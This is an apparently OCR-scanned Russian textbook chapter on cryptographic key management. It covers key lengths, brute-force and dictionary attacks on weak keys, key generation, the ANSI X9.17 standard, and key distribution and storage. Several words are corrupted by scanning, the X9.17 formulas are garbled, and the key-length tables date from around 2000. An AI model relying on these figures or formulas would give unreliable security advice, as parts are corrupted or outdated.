1536 3-10 11
2048 3-10 14

Сделанные предположения позволяют оценить длину стойкого открытого ключа в зависимости от срока, в течение которого необходимо хранить зашифрованные с его помощью данные в секрете (табл. 6.4). При этом необходимо помнить, что криптографические алгоритмы с открытым ключом часто применяются для защиты очень ценной информации на весьма долгий период времени. Например, в системах электронных платежей или при нотариальном заверении электронной подписи. Идея потратить несколько месяцев на разложение большого числа на множители может показаться кому-то очень привлекательной, если в результате он получит возможность рассчитываться за свои покупки по вашей кредитной карточке. Кроме того, я думаю, что вам совсем не улыбается перспектива быть вызванным через 20 лет на заседание суда, на котором рассматривается дело о наследстве, отстаивать невозможность подделать электронную подпись вашего дедушки. использованную им для составления завещания в вашу пользу.

Таблица 6.4. Рекомендуемая длина открытого ключа (в битах)


Год Хакер Крупная корпорация Правительство
2000 1024 1280 1536
2005 1280 1536 2048
2010 1280 1536 2048
2015 1536 2048 2048

С приведенными в табл. 6.4 данными согласны далеко не все авторитетные криптографы. Некоторые из них наотрез отказываются делать какие-либо долгосрочные прогнозы, считая это бесполезным делом. Другие, например, специалисты из АНБ, чересчур оптимистичны, рекомендуя для систем цифровой подписи длину открытого ключа всего 512—1024 бита, что в свете данных из табл. 6.4 является совершенно недостаточным для обеспечения надлежащей долговременной защиты.

Какой длины должен быть ключ

Криптоаналитическая атака против алгоритма шифрования обычно своим острием бывает направлена в самое уязвимое место этого алгоритма. Например, для организации шифрованной связи часто используются криптографические алгоритмы как с секретным, так и с открытым ключом. Такая криптосистема называется гибридной. Стойкость каждого из алгоритмов, входящих в состав гибридной криптосистемы, должна быть достаточной, чтобы успешно противостоять вскрытию. Например, глупо применять симметричный алгоритм с ключом длиной 128 бит совместно с асимметричным алгоритмом, в котором длина ключа составляет всего 386 бит. И наоборот, не имеет смысла задействовать симметричный алгоритм с ключом длиной 56 бит вместе с асимметричным алгоритмом с ключом /шиной 1024 бита.

В табл. 6.5 перечисляются пары длин ключей для симметричного и асимметричного криптографического алгоритма, при которых стойкость обоих алгоритмов против криптоаналитической атаки методом тотального перебора приблизительно одинакова. Из данных, приведенных в табл. 6.5, например, следует, что если используется симметричный алгоритм со 112-битным ключом, то вместе с ним должен применяться асимметричный алгоритм с 1792-битным ключом. Однако на практике ключ для асимметричного алгоритма шифрования обычно выбирают несколько более стойким, чем для симметричного, поскольку с помощью первого защищаются значительно большие объемы информации и на более продолжительный срок.

Таблица 6.5. Длины ключей для симметричного и асимметричного алгоритмов шифрования с одинаковой стойкостью против криптоаналитической атаки методом тотального перебора


Длина ключа для симметричного алгоритма Длина ключа для асимметричного алгоритма
56 384
64 512
80 768
112 1792
128 2304

4. Работа с ключами

Работа с ключами

Предположим, некто Иванов и Петров пользуются надежной системой связи. Они делятся друг с другом своими соображениями на разные темы, играют в покер по переписке, заключают взаимовыгодные контракты, заверяя их своими цифровыми подписями, а затем производят расчеты между собой посредством электронных платежей. Алгоритм шифрования, используемый ими для этих целей, обладает сверхвысокой стойкостью. Но к сожалению, они покупают криптографические ключи в фирме "Ключкис и К о ", девиз которой гласит: "Полностью доверьтесь нам. Надежность — девичья фамилия бывшей тещи нашего генерального директора".

Давиду Ключкису вместе с его компанией не надо напрягаться и вскрывать алгоритм шифрования, применяемый Ивановым и Петровым. С помощью дубликатов проданных им ключей он может читать абсолютно всю их конфиденциальную переписку, подделывать их цифровые подписи и снимать деньги с их электронных счетов.

Работа с ключами является самым уязвимым местом в любой криптосистеме. Создать стойкий алгоритм шифрования тоже нелегко, однако в этом деле можно положиться на результаты многочисленных научных исследований, проводимых учеными-криптографами. Сохранить ключ в секрете от посторонних значительно сложнее.

А значит, нет необходимости потеть над вскрытием криптографического алгоритма. Проще добыть ключ, с которым не очень бережно обращается его владелец. Да и в человеке гораздо легче отыскать изъяны, чем в шифре.

Потратить 10 млн долл. на разработку и изготовление специализированного криптоаналитического суперкомпьютера? Ну уж нет! Лучше за 1000 долл. подкупить шифровальщика, который будет регулярно передавать ключи к шифру. А если бюджет позволяет, то за миллион долларов можно накупим, этих ключей на много-много лет вперед. Американский военнослужащий Джон Уокер, к примеру, годами снабжал советскую разведку ключами к шифрам ВМС США, что позволило КГБ прочесть огромное количество американских шифровок. Ну а за несколько миллионов долларов доставим, где-то ключи, чтобы потом с их помощью читать шифрованные сообщения, нет нужды и вовсе. За такие огромные деньги лучше сразу приобрести oi-крытые тексты этих сообщений. Например, всего 2 млн долларов понадобилось советской разведке, чтобы купить высокопоставленного сотрудника американской контрразведки Олдрича Эймса вместе с женой.

Ну а если из бюджета не удается выкроить нужную сумму на подкуй, то можно воспользоваться другими методами. Человек слаб: его можно напоить, усыпить или просто оглушить тяжелым предметом, чтобы выкраси, криптографические ключи. Его можно также соблазнить. Морские пехотинцы, охранявшие американское посольство в Москве, по просьбе своих русских любовниц пропускали в шифровальный отсек посольства сотрудников КГБ — на "экскурсию".

Это значит, что криптографические ключи нуждаются в такой же защите. как и сами данные, которые шифруются с их помощью. К сожалению, во многих коммерческих средствах шифрования часто считается достаточным провозгласить об использовании DES-алгоритма или другого достаточно стойкого шифра, а о генерации и хранении ключей к ним не говорить ни слова. Например, программа DiskLock (версия 2.1) для персонального компьютера Macintosh позволяет шифровать файлы по DES-алгоритму. Однако ключ, использованный этой программой для зашифрования, она сохраняет на носителе информации вместе с файлом. Зная, где лежит ключ, его можно оттуда извлечь и затем без особых хлопот прочесть с помощью этого ключа содержимое зашифрованного файла. В данном случае совершенно неважно. что сам алгоритм шифрования достаточно надежен. Имеет значение только то, что его реализация абсолютно никуда не годится.

5. Генерация случайных и псевдослучайных последовательностей

Зачем вообще нужно рассматривать вопрос о генераторах случайных и псевдослучайных последовательностей в криптографии? Ведь в руководстве но каждому компилятору описана функция, позволяющая генерировать случайные числа. Наверное, лучше не городить огород, а воспользоваться тем. что уже имеется?

Нет, не лучше. К сожалению, датчики "случайных" чисел, встроенные в компиляторы, не подходят для криптографических приложений, поскольку генерируемые ими числа недостаточно случайны. Надеяться породить нечто совершенно случайное на компьютере, который по своей природе является строго детерминированным устройством, по меньшей мере, безосновательно.

Псевдослучайные последовательности

Самое лучшее, на что способен компьютер, — это сгенерировать псевдослучайную последовательность, которая хотя и выглядит случайной, но, на самом деле, таковой не является. Период псевдослучайной последовательности должен быть достаточно большим, чтобы ее подпоследовательность требуемой длины была апериодичной, т. е. имела период, совпадающий с ее длиной. Например, если нужна строка из миллиона случайных бит, то для ее порождения не стоит использовать генератор последовательностей, которые повторяются через каждые 65536 бит.

Псевдослучайная битовая последовательность должна, по возможности, не отличаться от по-настоящему случайной. Необходимо, чтобы в ней число единиц примерно совпадало с числом нулей, а половина всех "полосок" (подряд идущих идентичных компонентов последовательности) имела длину I. одна четвертая — длину 2, одна восьмая — длину 4 и т. д. Кроме только что перечисленных, существует еще ряд общепринятых тестов, которые позволяют проверить, действительно ли данная последовательность является псевдослучайной.

Созданию хороших генераторов псевдослучайных последовательностей уделяется достаточно большое внимание в математике. В настоящее время удается порождать последовательности с периодом порядка 2000—3000 бит. Проблема в том, что все генераторы псевдослучайных последовательностей при определенных условиях дают предсказуемые результаты и корреляционные зависимости. А это как раз то, чего ждут от псевдослучайных последовательностей криптоаналитики, чтобы предпринять эффективную атаку на криптосистемы, где эти последовательности используются.

Криптографически надежные псевдослучайные последовательности

В криптографии к псевдослучайным последовательностям предъявляется гораздо большие требования, чем простое наличие у них определенных признаков статистической случайности. Чтобы псевдослучайная последовательность была криптографически надежной, необходимо, чтобы она была непредсказуемой. Это значит, что для криптографически надежной псевдослучайной битовой последовательности невозможно заранее сказать, каким будет ее следующий бит, даже зная алгоритм генерации этой последовательности и все ее предыдущие .биты. Как и любой криптографический алгоритм, генератор криптографически надежной псевдослучайной последовательности может быть атакован и вскрыт криптоаналитпком. Криптография учит, как сделать такие генераторы стойкими к криптоаналитическим атакам различных типов.

По-настоящему случайные последовательности

Последовательность называется no-настоящему случайной, если ее нельзя воспроизвести. Это означает, что если запустить генератор по-настоящему случайных последовательностей дважды при одном и том же входе, то на его выходе получатся разные случайные последовательности. Основная трудность состоит в том, чтобы суметь отличить случайную последовательность от неслучайной. Если несколько раз зашифровать строку символов с помощью криптографического алгоритма, соответствующего ГОСТ 28147-89, то получится последовательность, очень напоминающая по-настоящему случайную. Чтобы доказать ее неслучайность, другого способа, кроме аренды   АНБ соответствующих вычислительных мощностей и программы вскрытия. не существует. Однако вряд ли ваше предложение об аренде будет воспринято там всерьез.

6. Генерация ключей

Стойкость шифра должна определяться только секретностью ключа. Если для генерации ключей используется нестойкий алгоритм, криптосистема будет нестойкой. Вскрытию подвергнется не сам шифр, а алгоритм генерации ключей.

Сокращенные ключевые пространства

Длина ключа в DES-алгоритме составляет 56 бит. В принципе, в качестве ключа может быть использован любой 56-битный вектор. На практике это правило часто не соблюдается. Например, широко распространенная программа шифрования файлов Norton Discreet, входящая в пакет Norton Utilities (версии 8.0 или более младшей версии), который предназначен для работы в операционной системе DOS, предлагает пользователю программную реализацию DES-алгоритма. Однако при вводе ключа разрешается подавать на вход программы только те символы, старший бит представления которых в коде ASCII равен нулю. Более того, пятый бит в каждом байте введенного ключа является отрицанием шестого бита, и в нем игнорируется младший бит. Это означает, что мощность ключевого пространства сокращается до каких-то жалких 2 40 ключей. Таким образом из-за плохой процедуры генерации ключей программа Norton Discreet реализует алгоритм шифрования, ослабленный в десятки тысяч раз по сравнению с настоящим DES-алгоритмом.

В табл. 6.6 приведено количество возможных ключей в зависимости от раз-личных ограничений на символы, которые могут входить в ключевую последовательность. Табл. 6.7 содержит сложность атаки методом тотального перебора при условии, что перебор ведется со скоростью 1 млн ключей в секунду.

Таблица 6.6. Количество возможных ключей в зависимости от ограничений на символы ключевой последовательности


Символы ключа 4 байта 5 байт 6 байт 7 байт 8 байт
Строчные буквы (26) 4,7*10 5 1,3*10 7 3,2*10 8 8,1*10 9 2,2*10 11
Строчные буквы и цифры (36) 1,8*10 6 6,1*10 7 2.3*10 9 7,9*10 10 2.9*10 12
Буквы и цифры (62) 1,6*10 7 9,3*10 8 5,8*10 10 3,6*10 11 2,3*10 14
Печатаемые символы (95) 8,2*10 7 7,8*10 9 7,5*10 11 7,1*10 13 6,7*10 15
Все ASCII-символы 4,4*10 9 1,2*10 10 2,9*10 14 7,3*10 16 1,9*10 19

Таблица 6.7. Сложность атаки методом тотального перебора при условии, что перебор ведется со скоростью 1 миллион ключей в секунду


Символы ключа 4 байта 5 байт 6 байт 7 байт 8 байт
Строчные буквы (26) 0,6 сек. 13 сек. 6 мин. 2,3ч. 2,5 дн.
Строчные буквы и цифры (36) 1,8 сек. 2 мин. 37 мин. 23ч. 34 дн.
Буквы и цифры (62) 16 сек. 16 мин. 17ч. 42 дн. 7,0 лет
Печатаемые символы (95) 1,5 мин. 2,2ч. 8,6 дн. 2,3 лет 211 лет
Все ASCII-символы 1,3ч. 14 дн. 9,0 лет 2400 лет 590000 лет

Из табл. 6.6 следует, что возможность опробовать 1 млн ключей в секунду позволяет в разумные сроки вскрывать 8-байтовые ключи из строчных букв и цифр, 7-байтовые буквенно-цифровые ключи, 6-байтовые ключи, составленные из печатаемых ASCII-символов, и 5-байтовые ключи, в которые могут входить любые ASCII-символы. А если учесть, что вычислительная мощь компьютеров увеличивается вдвое каждые полтора года, то для успешного отражения атаки методом тотального перебора в течение ближайшего десятилетия необходимо заблаговременно позаботиться о том. чтобы используемый ключ был достаточно длинным.

Плохие ключи

Когда отправитель сам выбирает ключ, с помощью которого он шифрует свои сообщения, его выбор обычно оставляет желать лучшего. Например, Петр Сергеевич Иванов скорее предпочтет использовать в качестве ключа Ivanov, чем &7)g\*. И вовсе не потому, что он принципиально не желает соблюдать элементарные правила безопасности. Просто свою фамилию Иванов помнит гораздо лучше, чем абракадабру из шести произвольно взятых символов. Однако тогда сохранить свою переписку в тайне ему не поможет и самый стон кий алгоритм шифрования в мире, особенно если используемые Ивановым ключи всегда совпадают с именами его ближайших родственников и записывает он эти ключи на клочках бумаги, которые наклеивает на компьютер. В ходе хорошо организованной атаки методом тотального перебора квалифицированный криптоанатитик не будет опробовать все ключи последовательно, один за другим. Он сначала проверит те из них, которые хоть что-то значат для Иванова. Такая разновидность атаки методом тотального перебора наливается товарной атакой, поскольку в ходе нее противник использует словарь наиболее вероятных ключей. В этот словарь обычно входят:

  • Имя, фамилия, отчество, инициалы, год рождения и другая личная информация, имеющая отношение к данному человеку. Например, при словарной атаке против Петра Сергеевича Иванова в первую очередь следует проверить PSI, PSIPSI, PIVANOV, Pivanov, psivanov, peteri, pete I, IvanovP, peterivanov, Peter-Ivanov и т. д.
  • Словарная база данных, составленная из имен людей, героев мультфильмов и мифических животных, ругательств, чисел (как цифрами, так и прописью), названий художественных фильмов, научно-фантастических романов, астероидов, планет и цветов радуги, общепринятых сокращении и т. д. В общей сложности для одного конкретного человека такая база данных насчитывает более 60 тыс. словарных единиц.
  • Слова, которые получены путем внесения различных изменений в словарную базу данных, составленную на предыдущем этапе. Сюда относятся обратный порядок написания слова, замена в нем латинских буки о, l, z, s на цифры 0 , 1, 2 и 5 соответственно, использование слова во множественном числе и т. д. Это даст дополнительно еще около миллиона словарных единиц для опробования в качестве возможного ключа к шифру.
  • Слова, полученные с помощью замены строчных букв на заглавные. Такой замене в принципе может подвергаться любое число букв. Например. вместе со словом Ivanov будут проверяться слова iVanov, ivAnov, ivaNov, ivanOv, ivanoV, IVanov, IvAnov, IvaNov, IvanOv, IvanoV и т. д. Однако. вычислительная мощь современных компьютеров позволяет проверять только одно-, двух- и трехбуквенные замены строчных букв на заглавные.
  • Слова на различных иностранных языках. Хотя компьютерные пользователи в основном работают с англоязычными операционными системами (DOS, UNIX, Windows и другими), существуют локализованные версии распространенных операционных систем, в которых допускается использование другого языка. Это означает, в качестве ключа на вход программы шифрования может быть подана любая фраза на родном языке ее пользователя. Следует также учитывать, что ключ может быть транслитерирован с любого языка (например, с русского или китайского) на английский и затем в таком виде введен в программу шифрования.
  • Пары слов. Поскольку количество вероятных пар слов, из которых может состоять криптографический ключ, слишком велико, на практике криптоаналитики обычно ограничиваются словами из трех и четырех букв.

Случайные ключи

Хороший ключ представляет собой случайный битовый вектор. К примеру. если его длина составляет 56 бит, то это значит, что в процессе его генерации с одинаковой вероятностью может получиться любой из 2 56 возможных ключей. Источником случайных ключей обычно служит либо природный случайный генератор (хорошей аналогией такого генератора является маленький ребенок, который только что научился ходить, — временные интервалы между его падениями абсолютно случайны). Кроме того, источником случайного ключа может быть криптографически надежный генератор псевдослучайных битовых последовательностей. Лучше, чтобы процесс генерации ключей был автоматизирован. Если под рукой нет компьютера для запуска программы, реализующей псевдослучайный генератор, или ваш ребенок давно уже вышел из младенческого возраста, можно бросать монетку или игральную кость.

Использование хорошего генератора случайных чисел является очень важным моментом при генерации криптографических ключей, однако не следует слишком много спорить о том, какой из этих генераторов является более случайным. Важнее применять стойкие алгоритмы шифрования и надежные процедуры работы с ключами. Если у вас появились сомнения относительно случайности при выборе ключа, можно использовать один из методов генерации ключей, описанных ниже в этой главе.

Во всех алгоритмах шифрования имеются так называемые нестойкие ключи. Это означает, что некоторые из ключей к шифру являются менее надежными, чем остальные. Поэтому при генерации ключей нужно автоматически проверять их на стойкость и генерировать новые вместо тех, которые эту проверку не прошли. К примеру, в DES-алгоритме имеются всего 24 нестойких ключа из общего количества 2 56 , и следовательно вероятность наткнуться на нестойкий ключ пренебрежимо мала. Кроме того, откуда криптоаналитику знать, что для зашифрования конкретного сообщения или файла был применен именно нестойкий ключ? А сознательный отказ от использования нестойких ключей дает противнику дополнительную информацию о вашей криптосистеме, что нежелательно. С другой стороны, проверка ключей на нестойкость достаточно проста, чтобы ею пренебрегать.

Генерация открытых ключей гораздо более затруднена, чем генерация секретных ключей, поскольку открытые ключи должны обладать определенными математическими свойствами (например, должны быть результатом произведения двух простых чисел).

Пользоваться случайными ключами не всегда удобно. Иногда ключ требуется сохранить в памяти, а запомнить 36f9 67аЗ f9cb d931 человеку не так-то просто. В этом случае для генерации можно использовать некое правило, которое будет очевидно для вас, но недоступно для постороннего. Два варианта такого правила:

  • Составьте ключ из нескольких слов, разделенных знаками препинания. Например, очень просто и надолго запоминаются ключи типа Yankee'Go home.
  • Используйте в качестве ключа сочетание букв, которые представляют собой акроним более длинного слова. К примеру, броское название немецкого вина Liebenfraumilch позволяет путем отбрасывания гласных букв и добавления восклицательного знака сгенерировать ключ Lbnfrmlch!.

Пароль

Более привлекателен подход, при котором вместо отдельного слова используется достаточно длинное легко запоминающееся предложение на русском, английском или другом языке, которое преобразуется в ключ. Такое выражение в криптографии называется паролем. Для преобразования пароля в псевдослучайный битовый ключ можно воспользоваться любой однонаправленной хэш-функцией.

Пароль следует выбирать достаточно длинным, чтобы полученный в результате его преобразования ключ был случайным. Из теории информации известно, что в предложении на английском языке каждая буква содержит примерно 1,3 бита информации. Тогда, чтобы получить 64-бтный ключ, пароль должен состоять примерно из 49 букв, что соответствует английской фразе из 10 слов.

Необходимо, чтобы при желании пароль было легко вспомнить, и в то же время требуется, чтобы он был достаточно уникален. Цитата из Козьмы Пруткова, которая у всех на слуху, вряд ли подойдет, поскольку его сочинения имеются в форме, доступной для воспроизведения на компьютере, и следовательно, могут быть использованы в словарной атаке. Лучше воспользоваться творчеством малоизвестного поэта или драматурга, процитировав его с ошибками. Большего эффекта можно добиться, если в цитате, использованной для генерации ключа, будут присутствовать иностранные слова. Идеально подходят для этой цели незатейливые ругательства — их вам не придется записывать, чтобы запомнить. Достаточно шарахнуть себя по пальцу молотком, и пароль автоматически придет вам в голову. Надо только сдержаться и не произнести его вслух, чтобы не подслушали посторонние.

Несмотря на все сказанное, залогом наилучшей зашиты служит не шаманство при выборе пароля, а случайность полученного ключа. Хороший ключ — это случайный ключ, а значит, заранее будьте готовы к тому, что запомнить его наизусть будет очень трудно.

Стандарт ANSI X9.17

Американский национальный институт стандартов (ANSI) разработал метол генерации 64-битных ключей при помощи DES-алгоритма. Его основное назначение состоит в получении большого количества ключей для многократных сеансов связи. Вместо DES-алгоритма можно использовать любой другой стойкий алгоритм шифрования.

Пусть функция Е K (Р) осуществляет шифрование Р по DES-алгоритму на заранее заготовленном ключе К, который используется только для генерации секретных ключей. Пусть далее V 0 является начальным 64-битным значением, которое держится в тайне от противника, а Т i представляет собой отметку времени, когда был сгенерирован i-й ключ. Тогда очередной случайный ключ R i вычисляется с помощью преобразования:

R i = Е К К i ) Å V i )

Чтобы получить очередное значение V i , надо вычислить

V i = Е К К i ) Å R i )

7. Нелинейные ключевые пространства

Одна из проблем, которую приходится решать военным криптографам, состоит в том, чтобы в случае захвата противником разработанного ими стойкого криптографического оборудования максимально затруднить его использование для защиты вражеских коммуникаций. Первым шагом на пути к решению этой проблемы является аппаратная реализация алгоритма шифрования в виде модуля, который противник не сможет вскрыть с целью ознакомления с особенностями алгоритма.

Затем нужно позаботиться о том, чтобы используемые ключи имели специальный вид. Если введенный ключ имеет отклонения от этого вида, то для шифрования сообщений будет применяться значительно менее стойкий криптографический алгоритм. Желательно, чтобы шансы случайно придать ключу специальный вид, необходимый для шифрования по стойкому алгоритму, были пренебрежимо малы.

Ключевое пространство такого алгоритма шифрования называется нелинейным, поскольку ключи не являются в равной степени стойкими. Если же все ключи шифра обладают одинаковой стойкостью, то его ключевое пространство называют линейным или однородным. Один из способов добиться нелинейности ключевого пространства состоит в разделении используемого ключа на две части: собственно ключа шифрования и некоторой фиксированной строки открытого текста, зашифрованной с помощью этого ключа После расшифрования строки криптомодуль сравнивает полученный открытый текст с эталонным и при совпадении работает но стойкому алгоритму шифрования, а при несовпадении использует значительно менее нестойкий.

Например, блочный алгоритм шифрования с длиной блока 64 бита и длиной ключа 128 бит может использовать "составной" ключ из 192 бит. Тогда вероятность случайно использовать стойкий ключ будет достаточно мала — всего 2 -64 .

Однако применить данный подход можно только при условии, что противник не в состоянии восстановить реализованный алгоритм шифрования методом обратного проектирования. Необходимо также добиться, чтобы разница в стойкости ключей не слишком бы бросалась противнику в глаза, и он ни о чем бы не догадался.

8. Передача ключей

Предположим, что Иванов и Петров обмениваются сообщениями, которые они защищают с использованием симметричного криптографического алгоритма. Для того чтобы зашифровать и потом расшифровать эти сообщения. они должны пользоваться одними и теми же ключами. Петров генерирует ключи при помощи хорошего генератора псевдослучайных битовых последовательностей. Вопрос в том, как Петров передает сгенерированные ключи Иванову. Например, они могут встретиться в каком-нибудь безлюдном месте (в кабинке вокзального туалета или на одном из спутников Сатурна), однако нет необходимости доказывать, что это не всегда удобно как для Петрова, так и для Иванова.

Посылать ключи Иванову, пользуясь тем же каналом связи, по которому они обмениваются шифрованными сообщениями, Петров тоже вряд ли захочет. Ведь если канал связи настолько ненадежен, что требует шифрования посылаемых сообщений, то отправка по нему ключа приведет к тому, что кто-нибудь перехватит этот ключ и сможет прочесть с его помощью пес шифрованные сообщения Иванова и Петрова.

Упоминавшийся выше американский стандарт ANSI X9.17 определяет две разновидности ключей. Ключи шифрования данных используются для зашифрования сообщений, отправляемых по каналам связи. Ключи шифрования ключей применяются для зашифрования других ключей, которые предназначены для передачи получателям этих шифрованных сообщении. Ключи шифрования ключей передаются по каналам связи, исключающим подслушивание. Например, с помощью курьеров. Однако, поскольку делать это приходится значительно реже, чем посылать ключи шифрования данных, такой способ передачи ключей абонентам сети связи вполне пригоден для использования на практике.

Другой способ распределения ключей состоит в разбиении ключа на части и в передаче этих частей ключа по различным каналам связи. Одну часть можно отправить телеграфом, другую — доверить телефону, третью — послать с почтовым голубем и т. д. Даже если противнику удастся завладеть всеми частями ключа, кроме одной, без подсказки он все равно не сумеем сообразить, что именно попало ему в руки.

Итак, Петров передает сгенерированные ключи Иванову либо при личной встрече с глазу на глаз, либо делит ключи на части, которые передает по различным каналам. Петров также может отсылать ключи Иванову, пользуясь тем же каналом, по которому он отправляет шифрованные сообщения, однако перед отсылкой ключей Петров должен зашифровать их с помощью ключа шифрования ключей. Поскольку количество передаваемых ключей не очень велико, ключ шифрования ключей часто менять не потребуется. Однако компрометация этого ключа даст противнику возможность прочесть всю шифрованную переписку, которая велась с его помощью, а посему оберегать ключ шифрования ключей следует с особенной тщательностью.

С ростом количества абонентов сети связи применять подход, рекомендуемый стандартом ANSI X9.17, становится все трудней и трудней. Если n человек захотят обмениваться шифрованными сообщениями, общее число переданных ими ключей составит п(п-1)/2. При n =1000 потребуется почти 500 тыс. пересылок ключей между абонентами, что может вылиться в серьезную проблему. В этом случае лучше производить рассылку ключей из единого центра (назовем его центром распределения ключей, сокращенно — ЦРК).

9. Проверка подлинности ключей

Как Иванову убедиться в том, что полученные им ключи были действительно переданы Петровым, а не противником, который притворился Петровым? Если Петров отдает ключи Иванову с глазу на глаз, то сделать это довольно легко. Однако если Петров присылает ключи с курьером, то Иванову придется положиться на честность курьера. А если полученные Ивановым ключи зашифрованы с помощью ключа шифрования ключей, ему остается лишь надеяться, что этот ключ имеется только у Петрова. Наконец, если рассылку ключей производит ЦРК, Иванов должен убедиться в надежности процедур рассылки, которые приняты в ЦРК.

Если противник полностью контролирует все каналы связи, которыми пользуется Иванов, он может заставить поверить Иванова во что угодно. Противник может прислать ему фальшивый ключ шифрования ключей якобы от Петрова и затем передавать Иванову поддельные ключи шифрования данных, зашифрованные на этом ключе. Противник будет в состоянии обзавестись собственным ЦРК и слать Иванову ключи от имени подлинного ЦРК. И ничего не подозревающий Иванов станет шифровать свои сообщения с помощью ключей, известных противнику.

Подобные рассуждения иногда приводятся, чтобы доказать ненужность криптографических методов, применяемых при передаче ключей Ведь получается, что у Иванова и Петрова нет иного пути удостовериться в подлинности используемых ими ключей на все 100%, кроме личной встречи.

Эти рассуждения наивны. На практике установить тотальный контроль нал чьими бы то ни было линиями связи невозможно. Действительно. Иванов не в силах убедиться наверняка, что переданный ему ключ не был подменен всемогущим противником. Однако, чтобы его контроль был действительно тотальным, такому противнику придется прибегнуть к средствам, которые в реальном мире ему вряд ли будут доступны.

Зная голос Петрова, Иванов может проверить подлинность полученною ключа по телефону. Если это открытый ключ, то его можно просто продиктовать. Если это секретный ключ, то его можно подвергнуть преобразованию с помощью однонаправленной хэш-функции и передать по телефону полученное значение для сравнения с аналогичным значением, подсчитанным на другом конце провода.

Нередко бывает, что Иванов желает убедиться: переданный ему ключ не только является подлинным, но и не был искажен при передаче. Ведь в результате Иванов может оказаться не в состоянии прочесть многие мегабайты шифр-текста. Если соответствующий открытый текст был ASCII-файлом, то можно проверить ключ, попытавшись расшифровать с его помощью шифртекст, и получив абракадабру вместо осмысленного текста, сделать вывод о том, что ключ был передан с искажениями. Если открытый текст является достаточно случайным, можно прибегнуть к другим методам проверки ключа.

Один из них состоит в добавлении к передаваемому ключу так называемого верификационного блока — специального заголовка длиной несколько байт, который известен и отправителю, и получателю. Петров посылает его Иванову в шифрованном виде вместе с ключом. С помощью этого ключа Иванов расшифровывает верификационный блок и убеждается, что полученный открытый текст совпадает с известным ему эталоном. В качестве верификационного блока можно использовать контрольную сумму, вычисленную для данного ключа. В этом случае Иванову нет необходимости знать верификационный блок заранее, до прихода ключа. Имея ключ, Иванов вычислит для него контрольную сумму, а затем сравнит ее со значением, которое он получит, расшифровав верификационный блок.

К сожалению, данный метод не свободен от существенных недостатков. Во-первых, при его использовании противник может организовать крпптоаналитическую атаку со знанием открытого текста. Во-вторых, он облегчает вскрытие шифров с относительно коротким ключом (подобных DES-алгоритму). Криптоаналитику достаточно вычислить контрольные суммы для каждого возможного ключа, а затем использовать эти контрольные суммы для определения ключей, примененных при шифровании перехватываемых в дальнейшем сообщений. Чтобы избавиться от этих недостатков, к вычисленной контрольной сумме ключа каждый раз необходимо добавлять случайные или хотя бы различные биты.

10. Контроль за использованием ключей

Контроль за использованием ключей

Прогресс в области вычислительной техники идет семимильными шагами. Ныне даже персональные компьютеры повсеместно работают под управлением многозадачных операционных систем. В результате пользователь часто оказывается не в состоянии определить, когда операционная система прерывает выполнение его программы шифрования, записывает ее саму, а также все ее данные на диск и переключается на работу с другим приложением. После того как операционная система наконец возобновляет процесс шифрования, все выглядит вполне пристойно: пользователь даже не успевает осознать, что шифровальная программа вместе с используемым ею ключом побывала на диске. В итоге ключ так и останется на диске в незашифрованном виде, пока поверх него не будут записаны другие данные. Когда это случится — через полсекунды, через месяц или вообще никогда, не может сказать никто. Однако враг не дремлет, и вполне может произойти так, что ключ все еще будет храниться на диске в открытую, когда вражеский агент проверит этот диск в поисках полезной информации.

В некоторых случаях для организации обмена шифрованными сообщениями применяются сеансовые ключи. Они называются так потому, что используются лишь в одном сеансе связи, а затем уничтожаются. В результате вероятность их компрометации уменьшается. Еще больше понизить эту вероятность можно с помощью следующего метода.

К сгенерированному ключу (назовем его основным) добавляется битовый управляющий вектор (УВ), который содержит информацию об ограничениях, накладываемых на использование этого ключа. УВ подвергается хэшированию и затем складывается с основным ключом по модулю 2. Полученный результат служит в качестве ключа для зашифрования сеансового ключа. Зашифрованный сеансовый ключ хранится вместе с УВ. Чтобы получить сеансовый ключ в исходном виде, надо применить хэширование к УВ, сложить его с основным ключом по модулю 2 и использовать результат для расшифрования сеансового ключа. Достоинством этого метода является возможность задействовать УВ произвольной длины и открыто хранить его вместе с зашифрованным основным ключом.

11. Обновление ключей

Иногда при частой смене ключей оказывается очень неудобно каждый риз передавать их абонентам сети для использования при шифровании и расшифровании сообщений. В качестве выхода из этой неудобной ситуации можно предложить генерацию новых ключей из старых, называемую в криптографии обновлением ключей.

Если Иванов и Петров владеют общим криптографическим ключом, то, подав его на вход одной и той же однонаправленной функции, они получат одинаковый результат, из которого смогут выбрать необходимое число 6ит, чтобы составить из них новый ключ. Необходимо только помнить о том, что новый ключ будет обладать такой же стойкостью, что и старый. Если противник знает старый ключ, он может вычислить для этого ключа соответствующее значение однонаправленной функции и получить в свое распоряжение новый ключ.

12. Хранение ключей

Проще всего хранить ключи для криптосистемы, у которой имеется один-единственный пользователь. Пользователь просто запоминает этот ключ и при необходимости вводит его с клавиатуры компьютера по памяти. Однако поскольку по-настоящему случайный ключ запомнить нелегко, для его хранения можно использовать магнитную карточку, или пластиковый ключ с размещенным на нем ПЗУ (так называемый ПЗУ-ключ), или интеллектуальную карту. Для ввода такого ключа достаточно вставить его физический носитель в специальный считыватель, подключенный к компьютеру. При этом действительное значение вводимого ключа пользователю неизвестно, и, следовательно, он не сможет его разгласить или скомпрометировать. Способ использования ключа определяется управляющим вектором, записанным па физический носитель вместе с этим ключом.

ПЗУ-ключ придумали очень умные люди. Пользователь обычно гораздо лучше осознает, как правильно обращаться с обычным ключом от замка. Придание криптографическому ключу такого же вида, какой имеет ставший нам привычным замковый ключ, позволяет чисто интуитивно избегать многих ошибок, связанных с хранением криптографических ключей.

С целью дальнейшего уменьшения вероятности компрометации ключа можно разделить его на две части. Первую следует реализовать в виде ПЗУ-ключа, а вторую поместить в память компьютера. Тогда потеря "пэ-зэ-ушной" части ключа или его половинки, хранимой в памяти компьютера, не приведет к разглашению криптографического ключа в целом. А части ключа при необходимости можно заменить отдельно друг от друга.

Трудно запоминаемые ключи можно хранить на компьютерном диске в зашифрованном виде. Например, открытый ключ, состоящий из большого количества цифр, лучше всего зашифровать с помощью DES-алгоритма и запомнить на диске. Более короткий ключ к DES-алгоритму легче припомнить, когда понадобится расшифровать открытый ключ.

Если ключи генерируются с использованием хорошего датчика псевдослучайных битовых последовательностей, может оказаться более удобным не хранить сгенерированные ключи, а каждый раз заново генерировать их, задавая соответствующее начальное значение датчика, которое легко запоминается.

13. Запасные ключи

Запасные ключи

